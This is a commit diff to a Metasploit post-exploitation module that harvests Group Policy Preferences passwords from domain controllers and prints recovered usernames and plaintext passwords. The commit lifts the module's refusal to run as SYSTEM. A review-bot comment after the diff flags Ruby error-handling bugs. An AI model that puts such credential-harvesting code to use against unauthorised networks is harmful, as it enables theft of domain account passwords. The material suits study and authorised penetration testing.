Allowed to run as SYSTEM

Meatballs1 2012-06-22 11:17:24 +01:00
commit 0ed49998e2
1 changed files with 25 additions and 15 deletions


@ -28,9 +28,6 @@ class Metasploit3 < Msf::Post
Users can specify ALL=True to target all domains and their domain controllers
on the network.
This module must be run under a domain user or the user will not have appropriate
permissions to read files from the domain controller(s).
},
'License' => MSF_LICENSE,
'Author' =>[
@ -58,11 +55,6 @@ class Metasploit3 < Msf::Post
end
def run
if is_system?
print_error "This needs to be run as a Domain User, not SYSTEM"
return nil
end
dcs = []
paths = []
@ -87,7 +79,7 @@ class Metasploit3 < Msf::Post
dcs << found_dcs[0] unless found_dcs.to_a.empty?
end
elsif datastore['CURRENT']
dcs << get_domain_controller()
dcs << get_domain_controller
else
print_error "Invalid Arguments, please supply one of CURRENT, ALL or DOMAINS arguments"
return nil
@ -156,6 +148,15 @@ class Metasploit3 < Msf::Post
user = node.attributes['userName']
newname = node.attributes['newName']
disabled = node.attributes['acctDisabled']
action = node.attributes['action']
expires = node.attributes['expires']
never_expires = node.attributes['neverExpires']
description = node.attributes['description']
full_name = node.attributes['fullName']
no_change = node.attributes['noChange']
change_logon = node.attributes['changeLogon']
sub_authority = node.attributes['subAuthority']
changed = node.parent.attributes['changed'] # n.b. parent attribute.
# Check if policy also specifies the user is renamed.
if !newname.to_s.empty?
@ -166,7 +167,7 @@ class Metasploit3 < Msf::Post
# UNICODE conversion
pass = pass.unpack('v*').pack('C*')
print_good("DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled}")
print_good "DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled} CHANGED: #{changed}"
if session.db_record
source_id = session.db_record.id
@ -203,7 +204,7 @@ class Metasploit3 < Msf::Post
#enum_domains.rb
def enum_domains
print_status "Enumerating Domains on the Network..."
domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM = hex 80000000
domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM
buffersize = 500
result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil)
# Estimate new buffer size on percentage recovered.
@ -222,14 +223,15 @@ class Metasploit3 < Msf::Post
base = 0
domains = []
mem = client.railgun.memread(startmem, 8*count)
count.times{|i|
count.times do |i|
x = {}
x[:platform] = mem[(base + 0),4].unpack("V*")[0]
nameptr = mem[(base + 4),4].unpack("V*")[0]
x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join
domains << x
base = base + 8
}
end
return domains
end
@ -277,7 +279,9 @@ class Metasploit3 < Msf::Post
value = v.data
open_key.close
rescue
print_error e.message
end
return value
end
@ -289,9 +293,15 @@ class Metasploit3 < Msf::Post
v_name = "DCName"
domain = reg_getvaldata(subkey, v_name)
rescue
print_error "This host is not part of a domain."
print_error e.message
end
if domain.nil?
print_error "No domain controller retrieved - is this machine part of a domain?"
return nil
else
return domain.sub!(/\\\\/,'')
end
return domain.sub!(/\\\\/,'')
end
end
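Review bot: Both new `print_error e.message` lines (the one inside the `rescue` of the registry-read helper and the one in the domain-lookup `rescue` near the end of the diff) reference `e`, but a bare `rescue` never binds that name, so the handler itself raises NameError and the original error is discarded; each should read `rescue => e`. The `return domain.sub!(/\\\\/,'')` branch also returns nil whenever DCName does not start with a double backslash, because the bang form returns nil when nothing was replaced, so a valid DC name is silently dropped; `return domain.sub(/\\\\/, '')` preserves it either way. Both enclosing methods begin outside the hunks shown. With the SYSTEM guard removed by this commit, a SYSTEM session that cannot read the domain controller's share presumably surfaces only through these error paths, so they need to print the real exception rather than crash.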